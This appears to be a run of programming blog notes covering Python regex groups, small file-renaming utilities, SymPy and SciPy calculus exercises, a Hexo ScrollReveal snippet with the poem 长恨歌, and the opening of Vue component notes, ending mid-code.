re.findall('[^A-Z]+', string) # matches every non-uppercase character
    [', ', 'here, ', 'ow, ', 're, ', 'ou...']
     

    GROUPS


# a contrived example
import re
string = 'John has 6 cats but I think my friend Susan has 3 dogs and Mike has 8 fishes'

re.findall(r'[A-Za-z]+ \w+ \d+ \w+', string)
    ['John has 6 cats', 'Susan has 3 dogs', 'Mike has 8 fishes']
     

re.findall(r'([A-Za-z]+) \w+ \d+ \w+', string) # pull out just the names
    ['John', 'Susan', 'Mike']
     
re.findall(r'[A-Za-z]+ \w+ \d+ (\w+)', string) # pull out the animals
    ['cats', 'dogs', 'fishes']
     
re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
# use the original string to make sure the match is correct, then use groups to pull out the info you want
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
     
# organize the data by data type
info = re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)

info
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
     

Python 3's zip() function


• zip() takes iterables as arguments, packs their corresponding elements into tuples, and returns an object made of those tuples, which saves a fair amount of memory.
• zip(*), conversely, can be understood as unzipping: it returns the data in its two-dimensional, matrix-like form.
list(zip(*info))  # organize your data by category
    [('John', 'Susan', 'Mike'), ('6', '3', '8'), ('cats', 'dogs', 'fishes')]
     
match = re.search(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)  # pulls out three groups
match
    <re.Match object; span=(0, 15), match='John has 6 cats'>
     
match.group(0)
    'John has 6 cats'
     
match.groups()
    ('John', '6', 'cats')
     
match.group(1)
    'John'
     
match.group(2)
    '6'
     
match.group(3)
    'cats'
     
match.group(1, 3)  # multiple groups
    ('John', 'cats')
     
match.group(3, 2, 1, 1)  # change the order
    ('cats', '6', 'John', 'John')
     
match.span()
    (0, 15)
     
match.span(2)
    (9, 10)
     
match.span(3)
    (11, 15)
     
match.start(3)
    11
     
# findall has no group function
re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string).group(1)
    ---------------------------------------------------------------------------
     
     AttributeError                            Traceback (most recent call last)
    AttributeError: 'list' object has no attribute 'group'
re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)[0]
    ('John', '6', 'cats')
     
re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)[0].group(1)  # this doesn't work either
    ---------------------------------------------------------------------------
     
     AttributeError                            Traceback (most recent call last)
    AttributeError: 'tuple' object has no attribute 'group'
re.findall(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
     
data = re.findall(r'(([A-Za-z]+) \w+ (\d+) (\w+))', string)  # a group inside a group

data
    [('John has 6 cats', 'John', '6', 'cats'),
      ('Susan has 3 dogs', 'Susan', '3', 'dogs'),
      ('Mike has 8 fishes', 'Mike', '8', 'fishes')]
     
# with findall, this is the only way
for i in data:
    print(i[3])
    cats
     dogs
     fishes

Python's next() function

it = re.finditer(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
next(it).groups()
    ('John', '6', 'cats')
     
it = re.finditer(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
for element in it:
    print(element.group(1, 3, 2)) # don't forget that iterators exhaust
    ('John', 'cats', '6')
     ('Susan', 'dogs', '3')
     ('Mike', 'fishes', '8')
     
it = re.finditer(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
for element in it:
    print(element.group())
    John has 6 cats
     Susan has 3 dogs
     Mike has 8 fishes
     
it = re.finditer(r'([A-Za-z]+) \w+ (\d+) (\w+)', string)
for element in it:
    print(element.groups())
    ('John', '6', 'cats')
     ('Susan', '3', 'dogs')
     ('Mike', '8', 'fishes')
     

    Naming Groups

import re

string = 'New York, New York 11369'
• ([A-Za-z\s]+) the city
• ([A-Za-z\s]+) the state
• (\d+) the zip code
match = re.search(r'([A-Za-z\s]+),([A-Za-z\s]+)(\d+)', string)

match.group(1), match.group(2), match.group(3), match.group(0)
    ('New York', ' New York ', '11369', 'New York, New York 11369')
     

?P<> names a group: the group name goes inside the <>, followed by the RE for that group


• (?P<City>)
• (?P<State>)
• (?P<ZipCode>)
pattern = re.compile(r'(?P<City>[A-Za-z\s]+),(?P<State>[A-Za-z\s]+)(?P<ZipCode>\d+)')

match = re.search(pattern, string)

match.group('City'), match.group('State'), match.group('ZipCode')
    ('New York', ' New York ', '11369')
     
match.group(1)
    'New York'
     
match.groups()
    ('New York', ' New York ', '11369')
     
# just in case you forget the names of the groups you used
match.groupdict()
    {'City': 'New York', 'State': ' New York ', 'ZipCode': '11369'}
     

    Quantifiers on groups

import re

string = 'abababababab'  # ab repeated many times
re.search('(ab)+', string) # (ab)+ is one group matched many times in a row
    <re.Match object; span=(0, 12), match='abababababab'>
     
string = 'abababababab'  # ab repeated many times

re.search('[ab]+', string) # this is different
    <re.Match object; span=(0, 12), match='abababababab'>
     

string = 'abababbbbbbb'  # only a partial fit to our new string
re.search('(ab)+', string)
    <re.Match object; span=(0, 6), match='ababab'>
     
string = 'abababbbbbbb'  # but this pattern fits perfectly
re.search('[ab]+', string)
    <re.Match object; span=(0, 12), match='abababbbbbbb'>
     
string = 'abababbbbbbb'  # allows flexibility
re.search(r'(ab)+\w+', string)
    <re.Match object; span=(0, 12), match='abababbbbbbb'>
     
string = 'abababsssss'  # allows flexibility
re.search(r'(ab)+\w+', string)
    <re.Match object; span=(0, 11), match='abababsssss'>
     

    Nuances to be wary of


# only one group, not multiple groups

string = 'abababababab' # the original string
match = re.search('(ab)+', string)

match.group(1)
# only one group is captured; its value is overwritten on each repetition
    'ab'
     
match.group(2) # no value
    ---------------------------------------------------------------------------
     
     IndexError                                Traceback (most recent call last)
IndexError: no such group

match.groups()  # only one group; its value was simply overwritten
    ('ab',)
     
match.group(0) # the full match, not related to groups
    'abababababab'
     

string = 'ababababab'

match = re.search('(ab)+(ab)+', string)
match
    <re.Match object; span=(0, 10), match='ababababab'>
     
match.groups()
    ('ab', 'ab')
     
match.span(2) # the first group is greedy
    (8, 10)
     

string = '123456789'

match = re.search(r'(\d)+', string)

match
    <re.Match object; span=(0, 9), match='123456789'>
     
    -
    (match.groups())  # only one group, and it uses the last value 只有一个组,它使用最后一个值
    +
    1
    (match.groups())  # only one group, and it uses the last value 只有一个组,它使用最后一个值
    ('9',)
     

    Quantifiers with groups within findall


string = '123456789'

re.findall('(\d)+', string)
# only pulls out the group, and only its last instance
['9']

string = '1234 56789'
re.findall('(\d)+', string)
# here we have two matches
['4', '9']

re.findall('((\d)+)', string)[1][0]
# to find the full match, create a main group engulfing the smaller groups
'56789'

# another example
string = 'abbbbb ababababab'
re.findall('(ab)+', string)  # two instances
['ab', 'ab']

string = 'abbbbb ababababab'
re.findall('((ab)+)', string)  # full match
[('ab', 'ab'), ('ababababab', 'ab')]
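If all you want are the full matches, re.finditer sidesteps findall's group-extraction behavior entirely (a quick sketch, not from the original):

import re

string = 'abbbbb ababababab'
# each Match object's group(0) is always the complete match
[m.group(0) for m in re.finditer('(ab)+', string)]
# ['ab', 'ababababab']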
     

    Groups for word completion

re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Birthday')
<re.Match object; span=(0, 14), match='Happy Birthday'>

re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Valentines')
<re.Match object; span=(0, 16), match='Happy Valentines'>

re.search('Happy Valentines| Happy Birthday | Happy Anniversary', 'Happy Valentines')
<re.Match object; span=(0, 16), match='Happy Valentines'>
     

    Non-capture Groups

# Here is one such example:
import re

string = '1234 56789'
re.findall('(\d)+', string)
['4', '9']

re.search('(\d)+', string).groups()  # using search
('4',)
     

A capturing group is a way of treating multiple characters as a single unit; it is created by wrapping the characters in parentheses. For example, the regular expression (dog) creates a single group containing the letters "d", "o", and "g". The part of the input string that matches the capturing group is kept in memory so it can be reused later via a backreference.

# comparison
re.findall('(\d)+', string)
['4', '9']

re.findall('(?:\d)+', string)  # with a non-capturing group
['1234', '56789']
     

re.findall('\d+', string)
# when the RE has no groups, findall outputs the entire match
['1234', '56789']

# Another example
string  = '123123 = Alex, 123123123 = Danny, 123123123123 = Mike, 456456 = rick, 121212 = John, 132132 = Luis,'

# We want to pull out all names whose ID contains 123
re.findall('(?:123)+ = (\w+),', string)  # three instances
['Alex', 'Danny', 'Mike']

# Another example
string = '1*1*1*1*22222 1*1*3333 2*1*2*1*222 1*2*2*2*333 3*3*3*444'

re.findall('(?:1\*){2,}\d+', string)
['1*1*1*1*22222', '1*1*3333']
     
BE CAREFUL with the order of the two characters:
• ?: correct!
• :? incorrect!
string = '1234 56789'
match = re.search('(?:\d)+', string)  # correct syntax
print(match.groups())
()

string = '1234 56789'
match = re.search('(:?\d)+', string)  # :? incorrect syntax!!!!
print(match.groups())
('4',)
     

    Summary:


# syntax and example

re.search(r'(\w+) \1', 'Merry Merry Christmas')  # looking for repeated words
<re.Match object; span=(0, 11), match='Merry Merry'>

re.search(r'(\w+) \1', 'Merry Merry Christmas').groups()
('Merry',)
     

    \1 is just referencing the first group within the regular expression

'\1' is a backreference to whatever the first parenthesized group captured. For example, '(\d)\1' matches two consecutive identical digit characters, such as the 33 in 33aa.

# Another example

re.findall(r'(\w+)', 'Happy Happy Holidays. Merry Christmas Christmas')
['Happy', 'Happy', 'Holidays', 'Merry', 'Christmas', 'Christmas']

re.findall(r'(\w+) \1', 'Happy Happy Holidays. Merry Christmas Christmas')  # we want to look for repeated words
['Happy', 'Christmas']

# another example

re.findall(r'(\w+) \1', 'Merry Merry Christmas Christmas Merry Merry Christmas')
['Merry', 'Christmas', 'Merry']
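Backreferences also work in the replacement string of re.sub, which makes collapsing the duplicates found above a one-liner (a quick sketch, not from the original):

import re

text = 'Happy Happy Holidays. Merry Christmas Christmas'
# the pattern finds a doubled word; replacing with r'\1' keeps a single copy
re.sub(r'(\w+) \1', r'\1', text)
# 'Happy Holidays. Merry Christmas'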
     
Python: Small Operations I Use All the Time

Preface

Jotting down some small operations I use all the time, so I don't have to search for them and tweak them on every single use orz

Main text

Print a run of markdown image code

for i in range(5):
    print('![png](E1.' + str(i + 1) + '.png)\n')
![png](E1.1.png)

![png](E1.2.png)

![png](E1.3.png)

![png](E1.4.png)

![png](E1.5.png)

Batch renaming

import os

path = r'd:\Pictures\QQplayerPic'
label = 'E5'
for index, file in enumerate(os.listdir(path)):
    os.rename(os.path.join(path, file), os.path.join(path, label + '.' + str(index + 1)) + ".png")
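One caveat: os.listdir returns entries in arbitrary order, so the numbering may not follow the original file names. A minimal sketch that sorts first (same folder and label as above):

import os

path = r'd:\Pictures\QQplayerPic'
label = 'E5'
for index, file in enumerate(sorted(os.listdir(path))):
    # sorting makes the E5.1, E5.2, ... numbering deterministic
    os.rename(os.path.join(path, file),
              os.path.join(path, label + '.' + str(index + 1)) + ".png")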

Batch renaming, with the renamed file list copied to the clipboard

import os
import pyperclip

path = r'd:\Pictures\QQplayerPic'
label = 'E5'
copy_text = ""
for index, file in enumerate(os.listdir(path)):
    copy_text += '![png](' + label + '.' + str(index + 1) + '.png)\n\n'
    os.rename(os.path.join(path, file), os.path.join(path, label + '.' + str(index + 1)) + ".png")
pyperclip.copy(copy_text)
print(copy_text)
![png](E5.1.png)

![png](E5.2.png)

![png](E5.3.png)

![png](E5.4.png)

![png](E5.5.png)

Python: Mathematical Foundations of AI (2-4)

Preface

1 Basics

2 Foundations of higher mathematics

Example 2.6: find the limit $\lim_{x \to 1}\frac{x ^ 2 - 1}{x - 1}$

import sympy
from sympy import oo
import numpy as np

x = sympy.Symbol('x')
f = (x ** 2 - 1) / (x - 1)
sympy.limit(f, x, 1)  # limit(expression, variable, value the variable approaches)

    $\displaystyle 2$

Example 2.11: find the derivative of $y = \arcsin\sqrt{\sin x}$

$y'=\frac{1}{\sqrt{1-\sin x}}\cdot\frac{1}{2\sqrt{\sin x}}\cdot\cos x=\frac{\cos x}{2\sqrt{\sin x-\sin^2 x}}$

from sympy import *
from sympy.abc import x  # import the symbol x

diff(asin(sqrt(sin(x))))  # diff computes the derivative

    $\displaystyle \frac{\cos{\left(x \right)}}{2 \sqrt{1 - \sin{\left(x \right)}} \sqrt{\sin{\left(x \right)}}}$

Example 2.12: find the partial derivatives of $f(x,y)=x^2+3xy+y^2$ at the point $(1,2)$

$f_{x}(x,y)=2x+3y$

$f_{y}(x,y)=3x+2y$

$f_{x}(1,2)=\left.(2x+3y)\right|_{x=1,\,y=2}=8$

$f_{y}(1,2)=\left.(3x+2y)\right|_{x=1,\,y=2}=7$

from sympy import *
from sympy.abc import x, y, f

f = x ** 2 + 3 * x * y + y ** 2
diff(f, x)  # partial derivative with respect to x

    $\displaystyle 2 x + 3 y$

diff(f, y)

    $\displaystyle 3 x + 2 y$

fx = diff(f, x)
fx.evalf(subs={x: 1, y: 2})  # pass values for several variables as a dict; returns the evaluated expression

    $\displaystyle 8.0$

fy = diff(f, y)
fy.evalf(subs={x: 1, y: 2})

    $\displaystyle 7.0$
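evalf returns floats (8.0, 7.0). If you prefer the exact integers, plain substitution works too; a minimal sketch with the same symbols:

from sympy import diff
from sympy.abc import x, y

f = x ** 2 + 3 * x * y + y ** 2
# subs keeps the arithmetic exact, yielding 8 and 7 rather than 8.0 and 7.0
diff(f, x).subs({x: 1, y: 2}), diff(f, y).subs({x: 1, y: 2})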

2.6 Directional derivatives & 2.7 The gradient

The gradient of a function at a point is a vector whose direction is the direction of greatest directional derivative.


import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np


def Fun(x, y):  # the function itself
    return x - y + 2 * x * x + 2 * x * y + y * y


def PxFun(x, y):  # partial derivative with respect to x
    return 1 + 4 * x + 2 * y


def PyFun(x, y):  # partial derivative with respect to y
    return -1 + 2 * x + 2 * y


if __name__ == "__main__":
    fig = plt.figure()  # create the figure
    # MatplotlibDeprecationWarning: Axes3D(fig) adding itself to the figure is deprecated since 3.4.
    # Pass the keyword argument auto_add_to_figure=False and use fig.add_axes(ax) to suppress this warning.
    # The default value of auto_add_to_figure will change to False in mpl3.5 and True values will no longer work in 3.6.
    ax = Axes3D(fig, auto_add_to_figure=False)  # create the 3D axes
    fig.add_axes(ax)
    # 3D plots need a dense multi-dimensional mesh, which np.mgrid provides.
    # np.mgrid[start:stop:step]: a complex step gives the number of points (both ends included);
    # a real step gives the spacing (stop excluded)
    X, Y = np.mgrid[-2:2:40j, -2:2:40j]
    Z = Fun(X, Y)
    # ax.plot_surface: https://blog.csdn.net/weixin_43584807/article/details/102331755
    # X, Y, Z: data values as 2D arrays
    # rstride: row stride; cstride: column stride
    # cmap: colormap for the surface
    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap="rainbow")
    ax.set_xlabel('x')  # axis labels
    ax.set_ylabel('y')
    ax.set_zlabel('z')
    # gradient descent
    step = 0.008  # step size
    x = 0  # initial values
    y = 0
    tag_x = [x]  # lists of points used for plotting
    tag_y = [y]
    tag_z = [Fun(x, y)]
    new_x = x
    new_y = y
    Over = False
    while not Over:
        new_x -= step * PxFun(x, y)  # step against the direction of greatest increase
        new_y -= step * PyFun(x, y)
        if Fun(x, y) - Fun(new_x, new_y) < 7e-9:
            Over = True
        x = new_x  # update
        y = new_y
        tag_x.append(x)  # record the point for plotting
        tag_y.append(y)
        tag_z.append(Fun(x, y))
    ax.plot(tag_x, tag_y, tag_z, 'r+')  # plot the descent path as red plus markers
    print('(x, y)~(' + str(x) + ',' + str(y) + ')')  # print the result
    plt.show()  # show the figure

(x, y)~(-0.9993608094022046,1.498965767887478)
     

(figure: rainbow surface of Fun(x, y) with the red gradient-descent path)
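As a quick analytic check (not in the original), the true minimizer follows from setting both partials to zero; a minimal SymPy sketch:

import sympy
from sympy.abc import x, y

f = x - y + 2 * x ** 2 + 2 * x * y + y ** 2
# solve grad f = 0; the descent above converged to roughly this point
sympy.solve([f.diff(x), f.diff(y)], [x, y])
# {x: -1, y: 3/2}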

2.9.5 Pro tips: three ways to take a derivative

Given $f(x)=x^5+2x^4+3x^2+5$, find $f'(1)$

Using SymPy's diff function

import sympy
from sympy.abc import x, f

f = x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5
fx = sympy.diff(f)
fx.evalf(subs={x: 1})

    $\displaystyle 19.0$

Using the derivative function from the scipy.misc module

import numpy as np
from scipy.misc import derivative


def f(x):
    return x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5

derivative(func=f, x0=1, dx=1e-6, n=1)  # function f, evaluated at 1, spacing 1e-6, first derivative
    18.999999999991246
     
Using poly1d from NumPy to build $f(x)$

import numpy as np

p = np.poly1d([1, 2, 0, 3, 0, 5])  # construct the polynomial
np.polyder(p, 1)(1.0)  # first derivative evaluated at x = 1.0
    19.0
     
p.deriv(1)(1.0)  # first derivative evaluated at x = 1.0
    19.0
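Note that newer SciPy releases deprecate and eventually drop scipy.misc.derivative, so a hand-rolled central difference is a safe fallback; a minimal sketch:

def central_diff(f, x0, h=1e-6):
    # symmetric difference quotient; error is O(h^2)
    return (f(x0 + h) - f(x0 - h)) / (2 * h)

def f(x):
    return x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5

central_diff(f, 1.0)  # ~19.0, matching the three results above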
     

2.10 Exercises

$\lim_{x\to1}\sin(\ln x)$
import sympy
from sympy.abc import x, f

f = sympy.sin(sympy.log(x))
sympy.limit(f, x, 1)

    $\displaystyle 0$

$\lim_{x\to8}\frac{\sqrt[3]{x}-2}{x-8}$
import sympy
from sympy.abc import x, f

f = (x ** (1/3) - 2) / (x - 8)
sympy.limit(f, x, 8)

    $\displaystyle \frac{1}{12}$

Find the derivative of $y=x^4-2x^3+5\sin x+\ln 3$

import sympy
from sympy import diff
from sympy.abc import x, y

y = x ** 4 - 2 * x ** 3 + 5 * sympy.sin(x) + sympy.log(3)
diff(y)

    $\displaystyle 4 x^{3} - 6 x^{2} + 5 \cos{\left(x \right)}$

Find the partial derivatives of $z=(3x^2+y^2)^{4x+2y}$ at the point $(1,2)$

$\ln z=(4x+2y)\cdot \ln(3x^2+y^2)$

$\frac1z\,dz=\left[4\ln(3x^2+y^2)+\frac{24x^2+12xy}{3x^2+y^2}\right]dx+\left[2\ln(3x^2+y^2)+\frac{8xy+2y^2}{3x^2+y^2}\right]dy$

import sympy
from sympy.abc import x, y, z

z = (3 * x ** 2 + y ** 2) ** (4 * x + 2 * y)
zx = sympy.diff(z, x)
zx

$\displaystyle \left(3 x^{2} + y^{2}\right)^{4 x + 2 y} \left(\frac{6 x \left(4 x + 2 y\right)}{3 x^{2} + y^{2}} + 4 \log{\left(3 x^{2} + y^{2} \right)}\right)$

zx.evalf(subs={x: 1, y: 2})

    $\displaystyle 84401203.0927369$

zy = sympy.diff(z, y)
zy

$\displaystyle \left(3 x^{2} + y^{2}\right)^{4 x + 2 y} \left(\frac{2 y \left(4 x + 2 y\right)}{3 x^{2} + y^{2}} + 2 \log{\left(3 x^{2} + y^{2} \right)}\right)$

zy.evalf(subs={x: 1, y: 2})

    $\displaystyle 48788945.5463684$

Directional derivatives and the gradient

Find the directional derivative of $z=x^2+y^2$ at the point $(1,2)$, in the direction from $(1,2)$ toward $(2,2+\sqrt{3})$, and the gradient at $(1,2)$

import sympy as sp
import numpy as np
from sympy.abc import x, y, z

z = x ** 2 + y ** 2
zx, zy = z.diff(x), z.diff(y)
gradz = np.array([zx.evalf(subs={x: 1, y: 2}), zy.evalf(subs={x: 1, y: 2})], dtype=float)  # the gradient
gradz
    array([2., 4.])
     
A = np.array([1, 2])
B = np.array([2, 2 + 3 ** 0.5], dtype=float)
gradz * (B - A) / np.linalg.norm(B - A)  # compute the directional derivative componentwise
    array([1.        , 3.46410162])
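Strictly speaking, the directional derivative is a scalar: the dot product of the gradient with the unit direction vector. The array above holds its two summands. A minimal sketch (not in the original) for the scalar value:

import numpy as np

gradz = np.array([2.0, 4.0])            # gradient at (1, 2), from above
u = np.array([1.0, 3 ** 0.5]) / 2.0     # unit vector toward (2, 2 + sqrt(3))
np.dot(gradz, u)                        # 1 + 2*sqrt(3) ≈ 4.4641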
     

3 Calculus

Example 3.6: definite integrals

Use the SciPy scientific computing library to evaluate $\int_{0}^{3} \cos^2(e^x)\,dx$

import numpy as np
from scipy.integrate import quad

func = lambda x: np.cos(np.exp(x)) ** 2  # define the integrand
quad(func, 0, 3)  # call the quad integration routine
    (1.296467785724373, 1.397797133112089e-09)
     

The output is (integral value, error estimate).

Example 3.7: double integrals

Evaluate $\iint_{D}e^{-x^2-y^2}\,dx\,dy$, where $D=\left\{ (x,y) \mid 0 \le x \le 10,\ 0 \le y \le 10\right\}$

import numpy as np
from scipy.integrate import dblquad  # double integration


def integrand(x, y):
    return np.exp(-x ** 2 - y ** 2)

x_a = 0
x_b = 10
y_a = 0
y_b = 10
"""
scipy.integrate.dblquad(func, a, b, gfun, hfun, args=(), epsabs=1.49e-08, epsrel=1.49e-08)
Parameters:
func : callable
    A Python function or method of at least two variables: y must be the first argument, x the second.
a, b : float
    The limits of integration in x, with a < b.
gfun : callable or float
    The lower boundary curve in y: a function taking a single float argument (x) and returning
    a float, or a float for a constant boundary curve.
hfun : callable or float
    The upper boundary curve in y (same requirements as gfun).
args : sequence, optional
    Extra arguments passed to func.
epsabs : float, optional
    Absolute tolerance passed directly to the inner 1-D quadrature. Default is 1.49e-8.
    dblquad tries to obtain an accuracy of abs(i - result) <= max(epsabs, epsrel * abs(i)),
    where i is the inner integral of func(y, x) from gfun(x) to hfun(x), and result is the
    numerical approximation. See epsrel below.
epsrel : float, optional
    Relative tolerance of the inner 1-D integrals. Default is 1.49e-8.
    If epsabs <= 0, epsrel must be greater than both 5e-29 and 50 * (machine epsilon).

Returns:
y : float
    The resulting integral.
abserr : float
    An estimate of the error.
"""
dblquad(integrand, x_a, x_b, lambda x: y_a, lambda x: y_b)
    (0.7853981633974476, 1.375309851021853e-08)
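The value is no accident: in polar coordinates the Gaussian integral over the whole first quadrant is exactly $\pi/4$, and $[0,10]^2$ already captures it to about 8 decimals. A quick SymPy check (not in the original):

import sympy
from sympy.abc import x, y

# exact Gaussian integral over the first quadrant
sympy.integrate(sympy.exp(-x ** 2 - y ** 2), (x, 0, sympy.oo), (y, 0, sympy.oo))
# pi/4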
     

Example 3.8: approximating a definite integral

Approximate $\int_{0}^{3} \cos^2(e^x)\,dx$ from the definition

from numpy import *

a, b = 0, 3


def f(x):
    return cos(exp(x)) ** 2


def trape(n):
    h = (b - a) / n  # width after splitting the interval into n equal parts
    x = a
    sum = 0
    for i in range(1, n):  # as written, this accumulates n - 1 trapezoids
        x2 = a + i * h
        sum += (f(x) + f(x2)) * h / 2  # area of one small trapezoid: (top + bottom) * height / 2
        x = x2
    return sum

trape(10)
    0.944822326405313
     
trape(100)
    1.2843391540917448
     
trape(1000)
    1.2960750567338157
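For comparison, NumPy ships a trapezoidal rule; on a comparable grid it gives a close value (a quick sketch, not in the original):

import numpy as np

xs = np.linspace(0, 3, 1001)             # 1000 subintervals
np.trapz(np.cos(np.exp(xs)) ** 2, xs)    # ≈ 1.296, in line with quad's 1.29647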
     

Indefinite integrals

$\int \ln x \,dx$

from sympy import *
from sympy.abc import x

expr = log(x)
integrate(expr, x)

    $\displaystyle x \log{\left(x \right)} - x$

3.8 Exercises

$\int _{1}^{2} x^2 + \frac {1}{x^4}\,dx$

$= \left(\frac {1}{3}x^3 - \frac {1}{3}x^{-3}\right)\Big| _{1}^{2}$

$= \frac {21}{8}$

import numpy as np
from scipy.integrate import quad

func = lambda x: x ** 2 + x ** (-4)
quad(func, 1, 2)
    (2.625, 2.914335439641036e-14)
     

$\int _{-1}^{0}\frac {3x^4+3x^2+1}{x^2+1}\,dx$

$=\int _{-1}^{0}3x^2+\frac {1}{1+x^2}\,dx$

$= \left(x^3 + \arctan x\right)\Big| _{-1}^{0}$

$= 1 + \frac{\pi}{4}$

import numpy as np
from scipy.integrate import quad

func = lambda x: (3 * x ** 4 + 3 * x ** 2 + 1) / (1 + x ** 2)
quad(func, -1, 0)
    (1.7853981633974483, 1.9821901491273144e-14)
     

Use the definition of the definite integral to evaluate the limit:


Example 4.7: use the $n$-th order Taylor expansion of $e^x$ to approximate $e$

$e\approx 1+1+\frac{1}{2!}+\frac{1}{3!}+\dots+\frac{1}{n!}$

import numpy as np
import pandas as pd


def f(n):
    sum1 = 1
    if n == 0:
        sum1 = 1
    else:
        m = n + 1
        for i in range(1, m):
            sum2 = 1.0
            k = i + 1
            for j in range(1, k):
                sum2 = sum2 * j  # after this loop, sum2 == i!
            sum1 = sum1 + 1.0 / sum2
    return sum1


num = 10
pd.DataFrame(np.array([[i, f(i)] for i in range(1, num + 1)]), columns=['n', 'e'])
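The same partial sums can be written far more compactly with math.factorial; a minimal sketch (not in the original):

import math

def approx_e(n):
    # partial sum of the Taylor series of e^x at x = 1
    return sum(1 / math.factorial(k) for k in range(n + 1))

approx_e(10), math.e  # (2.7182818011463845, 2.718281828459045)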

Resources

Quick start

At the bottom of the article, include this js and select the DOM nodes the effect should apply to:

<script src="/js/scrollreveal.js"></script>
<script>ScrollReveal().reveal('article .poem p');</script>
<script>ScrollReveal().reveal('article .poem img');</script>

When these DOM nodes enter the viewport, they fade in.

However, this likely conflicts with the Troy-Yang/hexo-lazyload-image plugin (lazyload image plugin for Hexo).

Demo

长恨歌 (Song of Everlasting Regret)

长恨歌 白居易

    汉皇重色思倾国,御宇多年求不得。

    杨家有女初长成,养在深闺人未识。

    天生丽质难自弃,一朝选在君王侧。

    回眸一笑百媚生,六宫粉黛无颜色。

    春寒赐浴华清池,温泉水滑洗凝脂。

    侍儿扶起娇无力,始是新承恩泽时。

    云鬓花颜金步摇,芙蓉帐暖度春宵。

    春宵苦短日高起,从此君王不早朝。

    承欢侍宴无闲暇,春从春游夜专夜。

    后宫佳丽三千人,三千宠爱在一身。

    金屋妆成娇侍夜,玉楼宴罢醉和春。

    姊妹弟兄皆列土,可怜光彩生门户。

    遂令天下父母心,不重生男重生女。

    骊宫高处入青云,仙乐风飘处处闻。

    缓歌谩舞凝丝竹,尽日君王看不足。

    渔阳鼙鼓动地来,惊破霓裳羽衣曲。

    九重城阙烟尘生,千乘万骑西南行。

    翠华摇摇行复止,西出都门百余里。

    六军不发无奈何,宛转蛾眉马前死。

    花钿委地无人收,翠翘金雀玉搔头。

    君王掩面救不得,回看血泪相和流。

    黄埃散漫风萧索,云栈萦纡登剑阁。

    峨嵋山下少人行,旌旗无光日色薄。

    蜀江水碧蜀山青,圣主朝朝暮暮情。

    行宫见月伤心色,夜雨闻铃肠断声。

    天旋地转回龙驭,到此踌躇不能去。

    马嵬坡下泥土中,不见玉颜空死处。

    君臣相顾尽沾衣,东望都门信马归。

    归来池苑皆依旧,太液芙蓉未央柳。

    芙蓉如面柳如眉,对此如何不泪垂。

    春风桃李花开日,秋雨梧桐叶落时。

    西宫南内多秋草,落叶满阶红不扫。

    梨园弟子白发新,椒房阿监青娥老。

    夕殿萤飞思悄然,孤灯挑尽未成眠。

    迟迟钟鼓初长夜,耿耿星河欲曙天。

    鸳鸯瓦冷霜华重,翡翠衾寒谁与共。

    悠悠生死别经年,魂魄不曾来入梦。

    临邛道士鸿都客,能以精诚致魂魄。

    为感君王辗转思,遂教方士殷勤觅。

    排空驭气奔如电,升天入地求之遍。

    上穷碧落下黄泉,两处茫茫皆不见。

    忽闻海上有仙山,山在虚无缥渺间。

    楼阁玲珑五云起,其中绰约多仙子。

    中有一人字太真,雪肤花貌参差是。

    金阙西厢叩玉扃,转教小玉报双成。

    闻道汉家天子使,九华帐里梦魂惊。

    揽衣推枕起徘徊,珠箔银屏迤逦开。

    云鬓半偏新睡觉,花冠不整下堂来。

    风吹仙袂飘飘举,犹似霓裳羽衣舞。

    玉容寂寞泪阑干,梨花一枝春带雨。

    含情凝睇谢君王,一别音容两渺茫。

    昭阳殿里恩爱绝,蓬莱宫中日月长。

    回头下望人寰处,不见长安见尘雾。

    惟将旧物表深情,钿合金钗寄将去。

    钗留一股合一扇,钗擘黄金合分钿。

    但教心似金钿坚,天上人间会相见。

    临别殷勤重寄词,词中有誓两心知。

    七月七日长生殿,夜半无人私语时。

    在天愿作比翼鸟,在地愿为连理枝。

    天长地久有时尽,此恨绵绵无绝期。

    长恨歌

The styles applied to the .poem block:

.poem { border: 2px solid var(--border); padding: 0 5px; }
.poem p { text-align: center; }

Web-Vue (Vue Component-Based Development & CLI Scaffolding)

Resources

Main text

I. Modules and Components, Modularization and Componentization

053 Understanding components


Modules

1. What: a js program that provides specific functionality to the outside; usually a single js file
2. Why: there is a lot of js and it gets complex
3. Benefit: reuse js, simplify js code, raise js efficiency

Components

1. What: a collection of code implementing a local (specific) piece of functionality (html/css/js/image…)

2. Why: a page's functionality is complex

3. Benefit: reuse code, simplify project code, raise efficiency

Modularization

When all the js in an application is written as modules, the application is modularized.

Componentization

When all the functionality in an application is built from components, the application is componentized.

II. Non-Single-File Components

054 Non-single-file components

The three big steps for using a component in Vue:

• Define the component (create it)

• Register the component

• Use the component (write the component tag)

1. How do you define a component?

Create it with Vue.extend(options), where options is almost the same as the options passed to new Vue(options), with a few differences:

• Do not write el. Why?
  • Every component is ultimately managed by a vm, and the vm's el decides which container it serves.
• data must be written as a function. Why?
  • To avoid shared references to the data when the component is reused.
• Note: use template to configure the component's structure.

2. How do you register a component?

• Local registration: pass a components option when calling new Vue
• Global registration: Vue.component('component-name', component)

3. Writing the component tag:

• <school></school>
<div id="root">
  <hello></hello>
  <hr>
  <h1>{{msg}}</h1>
  <school></school>
  <hr>
  <student></student>
</div>
<div id="root2">
  <hello></hello>
</div>
<script type="text/javascript">
  Vue.config.productionTip = false // stop Vue from printing the production tip on startup
  // create the components
  const school = Vue.extend({
